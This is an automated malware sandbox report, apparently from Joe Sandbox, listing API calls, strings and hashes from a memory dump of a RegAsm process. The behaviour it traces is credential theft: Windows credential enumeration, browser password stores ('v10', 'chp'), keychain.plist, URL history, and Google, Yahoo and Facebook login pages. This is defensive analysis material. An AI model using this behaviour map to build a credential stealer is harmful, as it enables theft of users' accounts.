                                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                          • memset.MSVCRT ref: 0044573D
                                                          • memset.MSVCRT ref: 00445755
                                                          • memset.MSVCRT ref: 004458CB
                                                          • memset.MSVCRT ref: 004458E3
                                                          • memset.MSVCRT ref: 0044596E
                                                          • memset.MSVCRT ref: 00445A10
                                                          • memset.MSVCRT ref: 00445A28
                                                          • memset.MSVCRT ref: 00445AC6
                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                          • memset.MSVCRT ref: 00445B52
                                                          • memset.MSVCRT ref: 00445B6A
                                                          • memset.MSVCRT ref: 00445C9B
                                                          • memset.MSVCRT ref: 00445CB3
                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                          • memset.MSVCRT ref: 00445B82
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                          • memset.MSVCRT ref: 00445986
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                          • API String ID: 2745753283-3798722523
                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                          • String ID: $/deleteregkey$/savelangfile
                                                          • API String ID: 2744995895-28296030
                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                          • memset.MSVCRT ref: 0040B756
                                                          • memset.MSVCRT ref: 0040B7F5
                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                          • memset.MSVCRT ref: 0040B851
                                                          • memset.MSVCRT ref: 0040B8CA
                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                          • memset.MSVCRT ref: 0040BB53
                                                          • memcpy.MSVCRT ref: 0040BB66
                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Freewcsrchr$AddressChangeCloseCreateFileFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                          • String ID: chp$v10
                                                          • API String ID: 824451583-2783969131
                                                          • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                          • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f ??3@YAXPAX@Z 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                          APIs
                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                          • memset.MSVCRT ref: 0040E380
                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                          • memcpy.MSVCRT ref: 0040E3EC
                                                          • memcpy.MSVCRT ref: 0040E407
                                                          • memcpy.MSVCRT ref: 0040E422
                                                          • memcpy.MSVCRT ref: 0040E43D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                          • API String ID: 3073804840-2252543386
                                                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                          • String ID:
                                                          • API String ID: 3715365532-3916222277
                                                          • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                          • memset.MSVCRT ref: 00413D7F
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                          • memset.MSVCRT ref: 00413E07
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                          • API String ID: 912665193-1740548384
                                                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                          • String ID: bhv
                                                          • API String ID: 327780389-2689659898
                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                          • API String ID: 2941347001-70141382
                                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                          • String ID:
                                                          • API String ID: 2827331108-0
                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 0040C298
                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                          • wcschr.MSVCRT ref: 0040C324
                                                          • wcschr.MSVCRT ref: 0040C344
                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                          • String ID: visited:
                                                          • API String ID: 1157525455-1702587658
                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                          • memset.MSVCRT ref: 0040E1BD
                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                          • API String ID: 3883404497-2982631422
                                                          • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                          • memset.MSVCRT ref: 0040BC75
                                                          • memset.MSVCRT ref: 0040BC8C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                          • memcpy.MSVCRT ref: 0040BD2B
                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                          • String ID:
                                                          • API String ID: 509814883-3916222277
                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                          • String ID: r!A
                                                          • API String ID: 2791114272-628097481
                                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                          • wcslen.MSVCRT ref: 0040C82C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                          • API String ID: 62308376-4196376884
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                          • memcpy.MSVCRT ref: 0040B60D
                                                          Similarity
                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                          • String ID: BIN
                                                          • API String ID: 1668488027-1015027815
                                                          APIs
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                          • wcslen.MSVCRT ref: 0040BE06
                                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                                          • memset.MSVCRT ref: 0040BE91
                                                          • memcpy.MSVCRT ref: 0040BEB2
                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                          • wcschr.MSVCRT ref: 0040BF24
                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                          Similarity
                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                          • String ID:
                                                          • API String ID: 3191383707-0
                                                          APIs
                                                          • memset.MSVCRT ref: 00403CBF
                                                          • memset.MSVCRT ref: 00403CD4
